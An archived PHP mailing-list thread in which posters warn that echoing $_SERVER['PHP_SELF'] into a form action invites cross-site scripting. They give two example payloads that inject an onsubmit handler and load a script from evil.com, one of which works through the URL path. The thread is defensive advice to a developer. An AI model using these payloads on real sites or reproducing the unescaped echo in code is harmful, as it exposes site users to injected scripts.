Re: Division by 0

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

I love this place, thank you to everyone that posted, I will make changes to 
make it safer.

Thanks again to everyone.

gary


"Jochem Maas" <jochem@xxxxxxxxxxxxx> wrote in message 
news:4B98DE7E.8020506@xxxxxxxxxxxxxxxx
> Op 3/10/10 11:39 PM, Daniel Egeberg schreef:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything in
>>>>> it.  Therefore, the loan_amount is not set making the value 0.  Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" 
>>>>> method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the following 
>>>> in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script
>>>> src="http://www.evil.com/evi.js";></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include query 
>>> string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>>   index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js";></script>
>>
>> But this will:
>>   index.php/" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js";></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
>
>
>
>>
>
>
> __________ Information from ESET Smart Security, version of virus 
> signature database 4933 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com
>
>
> 



__________ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __________

The message was checked by ESET Smart Security.

http://www.eset.com





-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux